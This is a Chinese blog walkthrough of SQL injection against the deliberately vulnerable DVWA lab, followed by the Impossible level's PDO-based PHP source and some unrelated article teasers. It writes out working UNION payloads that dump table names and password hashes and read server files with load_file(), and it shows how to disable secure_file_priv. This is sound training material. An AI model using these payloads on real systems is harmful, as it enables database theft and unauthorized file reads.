【精选】DVWA靶场SQL Injection(SQL注入)_dvwa回显注入-程序员宅基地
目录
一、有回显的SQL注入过程
1.找到注入点;
2.通过回显找到闭合方式;
3.使用order by判断列数;
4.使用union select判断显示位;
5.使用union select爆出数据库名和版本号;
6.已知数据库名后使用union select爆出表名和列名;
7.最后爆出列名内所需信息,如user和password;
8.此外还可使用union select来读取文件。
二、Low
1.输入1‘发现有如下闭合报错,则判断存在注入点,
2.输入1''后出现回显,说明闭合为单引号'
3. 判断列数,输入至1' order by 3#时出现报错,说明列数为2,
4. 使用如下语句判断显示位
1' union select 1,2#
5.输入如下语句爆出数据库名和版本号,
1' union select version(),database()#
6.已知数据库名后使用如下三种语句爆出表名,第三种内的0x64767761为dvwa的ASCII码,可以看到回显有两个表,
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#
7.同样使用三种方式爆出列名, name的ASCII码为0x7573657273,user以及password为我们需要的内容,
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()#1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761#
8.若提交后出现报错为“Illegal mix of collations for operation UNION”,原因是UNION两端的排序规则不同,我们打开phpstudy,在软件管理中找到叫phpMyAdmin的一个mysql管理工具并安装,点击“管理”打开,
9.登录时用户名密码为自己数据库的用户名和密码,找到dvwa的 数据库,到操作页面,拖至最下方将排序规则改为utf8_general_ci,点击“执行”,修改成功后排序规则问题就可解决,再次输入语句后不会报错,
10.我们知道需要的内容为user和password,输入如下语句,会爆出user和password的内容,但password为加密模式,我们可以在网页中对其进行解密,解密后user和password对应为:admin,password,gordonb,abc123,1337,charley,pablo,letmein,smithy,password
1' union select group_concat(user),group_concat(password) from users#
11.还可以使用如下语句来读取文件,在过程中出现了未显示文件内容的问题,查询后得知是权限不够,load_file()函数以及load data等语句都需要用户具有file权限,
1' union select 1,load_file('文件绝对路径')#
12.解决办法是修改数据库文件来阻止对MySQL的导入进行限制,在phpstudy文件中找到my.ini文件,
13. 在文中添加语句secure_file_priv='',还可以增加sql服务器和客户端传送数据包大小的最大值,
14.修改完成后重启mysql,再重新输入读取文件语句,发现文件内容可以成功显示,
15.再到数据库内查询该权限,发现不为NULL,
三、Medium
1.对比源代码可以发现medium级别添加了mysql_real_escape_string函数来对特殊字符进行转义,还使用了下拉列表来限制输入,
2.使用burp suite工具进行抓包,拦截到的数据如下,
3. 添加“ ' ”或者“ '' ”发现都会报错,说明输入的是数值,
4.直接添加or 1=1尝试,得到所有用户,
5. 找到了闭合方式,那么就可以开始进行注入了,首先判断列数,依旧发现在增加到三时出现报错,因此列数为二,
id=1 order by 3
6.判断显示位,
id=1 union select 1,2
7.爆出数据库名和版本号,
id=1 union select version(),database()
8.爆出表名,
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
9.爆出列名,
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761
10.爆出user和password,
id=1 union select user,password from users
四、 High
1.发现high级别的输入在一个独立的窗口中,从链接进入,
2. 输入1'发现页面报错,输入1''时有回显,因此判断闭合方式为“ ' ”,并且没有进行转义字符处理,
3. 那么我们继续开始第一步,判断列数,得到列数为2,
4.判断显示位 ,
5.爆出数据库名和版本号,
6.爆出表名,
7.爆出列名,
8.爆出user和password,
五、Impossible
查看impossible级别的源代码,发现使用了PDO技术来杜绝sql注入,
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
$id = intval ($id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
break;
case SQLITE:
global $sqlite_db_connection;
$stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
$stmt->bindValue(':id',$id,SQLITE3_INTEGER);
$result = $stmt->execute();
$result->finalize();
if ($result !== false) {
// There is no way to get the number of rows returned
// This checks the number of columns (not rows) just
// as a precaution, but it won't stop someone dumping
// multiple rows and viewing them one at a time.
$num_columns = $result->numColumns();
if ($num_columns == 2) {
$row = $result->fetchArray();
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
break;
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?> 智能推荐
使用Selenium渲染页面并提取数据-程序员宅基地
文章浏览阅读1.2w次。最近使用java爬虫收集数据,遇到js动态数据的时候使用如jsoup是获取不到数据的,所以要先进行页面的渲染。下面是以京东商城数据为例,使用Selenium需要先下好相应的驱动,我使用的是Chrome;还需要加入common-exec包import org.openqa.selenium.By;import org.openqa.selenium.WebDriver;import o
JavaWeb--MVC案例1-------(6)修改-程序员宅基地
文章浏览阅读50次。修改: 先显示(SELECT 操作)修改的页面,再进行修改(update) 显示修改页面 Update 的超链接:<a href="edit.do?id=<%= customer.getId() %>">UPDATE</a> edit 方法: 参考注释 JSP 页面: 获取请求域中的 Customer 对象,调用对应的字段的 get 方法来显...
maven-dependency-plugin (goals "copy-dependencies","unpack") is not supported by m2e-程序员宅基地
文章浏览阅读360次。添加pluginManagementorg.eclipse.m2elifecycle-mapping1.0.0org.apache.maven.pluginsmaven-dependency-plugin[2.0,)copy-dependenciesorg.apache.
轻松搞定javascript日期格式化问题-程序员宅基地
文章浏览阅读76次。Date.prototype.format = function(f){ var d = this f = f || "yyyy-MM-dd hh:mm:ss" return f.replace(/[yMdhms]+/g, function(item){ switch (item) { ...
MySQL基础(DDL、DML、DQL)_Tangable1024的博客-程序员宅基地
文章浏览阅读1.4w次,点赞117次,收藏709次。我们开发应用程序的时候,程序中的所有数据,最后都需要保存到专业软件中。这些专业的保存数据的软件我们称为数据库。我们学习数据库,并不是学习如何去开发一个数据库软件,我们学习的是如何使用数据库以及数据库中的数据记录的操作。而数据库软件是由第三方公司研发。SQL是用来存取关系数据库的语言,具有定义、操纵、控制和查询关系型数据库的四方面功能(DDL、DML、DQL、DCL)。所以针对四方面功能,我们学习对数据库的增、删、改、查。
statefulSet_kafka statefulset-程序员宅基地
文章浏览阅读556次。StatefulSet从本质上来说,可以看作Deployment/RC的一个特殊变种,它有如下特性:◎ StatefulSet里的每个Pod都有稳定、唯一的网络标识,可以用来发现集群内的其他成员。假设StatefulSet的名称为kafka,那么第1个Pod叫kafka-0,第2个叫kafka-1,以此类推。◎ StatefulSet控制的Pod副本的启停顺序是受控的,操作第n个Pod时,前n-1个Pod已经是运行且准备好的状态。◎ StatefulSet里的Pod采用稳定的持久化存储卷,通过PV或P_kafka statefulset
随便推点
Stack-栈的源码分析与实现-程序员宅基地
文章浏览阅读144次。一,Stack源码分析Stack,栈,也是数据结构的一种,对于java应用开发者而言,我使用栈的应用场景比较少,一般做做算法类的题会用到,对于实际的应用场景我觉得栈还是比较厉害的一种数据..._栈的操作源码
opencv学习笔记-入门(6)-camshift-程序员宅基地
文章浏览阅读3.6k次。CamShift算法简介CamShift算法,即"ContinuouslyApative Mean-Shift"算法,是一种运动跟踪算法。它主要通过视频图像中运动物体的颜色信息来达到跟踪的目的。我把这个算法分解成三个部分,便于理解:Back Projection计算。Mean Shift算法CamShift算法1 )Back Projection计算(反向投影)计算Ba
linux好用但是不好记的命令-程序员宅基地
文章浏览阅读68次。ps-ef|greptest.php|grep-vgrep|awk'{print$2}'|xargs kill -9统计某个ip出现的个数cat/var/log/nginx/80.log|awk'{print$1}'|sort|uniq-c|sort-rn磁盘大小排序du-sh./*|sort-rn查看php-fpm..._linux的操作命令为什么不好记
微机原理知识点总结1-3_bhe非是什么意思-程序员宅基地
文章浏览阅读2k次,点赞4次,收藏25次。参考图书:《微机原理与接口技术(第三版)》洪永强内容都是手打的,主要是对书内的知识点进行一个快速的浏览。主要是8086的汇编_bhe非是什么意思
linux下的init六种运行模式,linuxinit六种模式是什么?_徐立达的博客-程序员宅基地
文章浏览阅读237次。init是Linux系统里的根进程,是系统所有进程的祖先。它的主要作用是根据记录在/etc/inittab里的一个脚本(script)程序产生进程。这个文件通常用于控制用户的登录模式。Linux系统的有效登录模式有0~9共十种,不过沿用UNIX系统的至多6种的限制,一般只有1到6有效。init一般在系统启动时自动运行,也可以由root用户调用。它的作用是切换系统的运行状态。它的命令格式是:init..._虚拟机startx和init5有什么不同
音视频的数字化原理_声音和视频的数字化-程序员宅基地
文章浏览阅读2.0k次。今天本写了篇dicom医学图像解析的文章,后面听人谈到了音视频,今天我就再从中学物理写下我理解的音视频数字化原理。**音频:**物理上说声音三要素音调,响度,音色,响度直观理解就是声音的大小,声音的高低(高音、低音),音色,又称音品这两个其实都跟频率有关。声音的数字化呢,其实来源于原理的,物理上人能听到声音频率的范围是20hz到20khz,数字化采集声音时一般时按44.1khz采集的,就是1s中采集44100次,然后用16byte2个字节来存,一个采样能存的层级就是-2的8次方到2的8次方-1层,总的就是_声音和视频的数字化